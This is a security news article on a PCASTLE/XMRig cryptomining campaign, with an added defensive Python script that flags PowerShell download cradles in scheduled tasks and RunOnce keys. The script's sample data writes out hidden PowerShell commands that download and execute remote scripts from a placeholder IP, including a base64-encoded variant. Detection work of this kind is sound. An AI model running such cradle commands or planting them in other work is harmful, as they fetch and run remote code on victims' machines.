A new wave of attacks involving PCASTLE malware is targeting systems located in China with the XMRig cryptocurrency miner.
On 17 May, Trend Micro began observing a series of attacks that use PCASTLE, an obfuscated PowerShell script, to target mainly China-based systems with XMRig, cryptomining malware that was involved in numerous attacks in 2018. The security firm subsequently watched the campaign reach its peak on 22 May before leveling off.
Additional analysis of the attacks provided a detailed view into their infection chain. Relying on several components for propagation, the attacks use a scheduled task or a RunOnce registry key to download the first-layer PowerShell script. This script tries to reach a list of URLs so that it can retrieve a further PowerShell script, execute it and register it as another scheduled task.
At this stage, the scheduled task downloads and executes the second-layer PowerShell script, which sends information about the host back to its command-and-control (C&C) server before loading the third-layer PowerShell script. It is this component that downloads the XMRig module, which it injects into its own PowerShell process, as well as PCASTLE, which helps the campaign spread to other potential victims using exploit code for EternalBlue, brute-forcing capabilities and pass-the-hash techniques.
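The persistence described in the chain above (a scheduled task or RunOnce value that starts PowerShell, which then pulls the next stage from a URL) is the part a defender can hunt for without knowing the malware's hashes. The script below is an added example and is not code from the Trend Micro report or from PCASTLE: it scans task and RunOnce launch commands for PowerShell invoked with a download cradle, an encoded command or window-hiding/policy-bypass flags, decoding `-EncodedCommand` payloads so the cradle check also runs on the decoded text. The task rows, registry values and the 198.51.100.7 URL are constructed sample data, and the column set is a simplified subset of what `schtasks /query /fo csv /v` emits; the regular expressions are generic indicators of this launcher shape, not signatures of PCASTLE itself.

```python
"""Flag scheduled tasks and RunOnce values that launch PowerShell with a
download cradle or an encoded command. Added example; the sample data is
constructed and the patterns are generic indicators, not PCASTLE signatures."""
import base64
import binascii
import csv
import io
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: a simplified subset of the columns in `schtasks /query /fo csv /v`.
SAMPLE_SCHTASKS_CSV = r'''"TaskName","Task To Run","Run As User"
"\OneDrive Update","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","alice"
"\Backup Report","powershell.exe -NoProfile -File C:\Scripts\backup-report.ps1","SYSTEM"
"\WindowsUpdateSync","powershell.exe -nop -w hidden -ep bypass -c ""IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')""","SYSTEM"
'''

# Constructed sample: the base64 is computed here (UTF-16LE, as PowerShell expects) so it is exact.
_CRADLE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')"
_ENCODED = base64.b64encode(_CRADLE_PS.encode("utf-16-le")).decode("ascii")

SAMPLE_RUNONCE: Dict[str, str] = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Installer":
        r"C:\Windows\System32\msiexec.exe /i C:\Temp\tool.msi /qn",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\Update":
        "powershell.exe -NonI -W Hidden -Enc " + _ENCODED,
}

PS_EXE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|https?://",
    re.I,
)
EVASION = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-(?:ep|exec|executionpolicy)\s+bypass", re.I)

Finding = Tuple[str, str, List[str]]  # (source, name, reasons)


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand payload (base64 of UTF-16LE text)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def assess(command: str) -> List[str]:
    """Return the indicators found in one launch command line (empty if not PowerShell)."""
    if not PS_EXE.search(command):
        return []
    reasons = ["launches PowerShell"]
    text = command
    enc = ENC_FLAG.search(command)
    if enc:
        reasons.append("encoded command")
        decoded = decode_encoded_command(enc.group(1))
        if decoded:
            text += " " + decoded  # run the cradle check on the decoded script too
    if CRADLE.search(text):
        reasons.append("download cradle")
    if EVASION.search(command):
        reasons.append("hidden/bypass flags")
    return reasons


def is_suspicious(reasons: List[str]) -> bool:
    """PowerShell alone is normal admin tooling; a cradle or encoded body is the trigger."""
    return "launches PowerShell" in reasons and (
        "download cradle" in reasons or "encoded command" in reasons
    )


def scan_scheduled_tasks(csv_text: str) -> List[Finding]:
    findings: List[Finding] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = assess(row["Task To Run"])
        if is_suspicious(reasons):
            findings.append(("scheduled task", row["TaskName"], reasons))
    return findings


def scan_runonce(values: Dict[str, str]) -> List[Finding]:
    findings: List[Finding] = []
    for key, command in values.items():
        reasons = assess(command)
        if is_suspicious(reasons):
            findings.append(("RunOnce", key, reasons))
    return findings


def scan_all(csv_text: str = SAMPLE_SCHTASKS_CSV, runonce: Dict[str, str] = SAMPLE_RUNONCE) -> List[Finding]:
    return scan_scheduled_tasks(csv_text) + scan_runonce(runonce)


if __name__ == "__main__":
    for source, name, reasons in scan_all():
        print(f"[{source}] {name}: {', '.join(reasons)}")
```

On a live host, feed `scan_scheduled_tasks` the output of `schtasks /query /fo csv /v` and build the RunOnce dictionary from `reg query` of the HKCU and HKLM `RunOnce` keys; the benign `-File` task in the sample is deliberately left unflagged, since PowerShell by itself is too common to alert on, while a cradle or an encoded body is what a staged downloader of this kind needs.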
In its report on the campaign, Trend Micro said it is logical that those responsible for the attacks chose a Monero miner such as XMRig:
Their use of XMRig as their payload's miner module is also not surprising. Algorithms for Monero mining are not as resource-intensive compared to other miners, and don't require a lot of processing power. This means they can illicitly mine the cryptocurrency without alerting users unless they notice certain red flags like performance issues.
Organizations can protect themselves against attacks such as the ones described above by disabling PowerShell, WMI and macros if they're not using them. They should also use a vulnerability management program to keep their software up-to-date. Additional security recommendations for organizations are available here.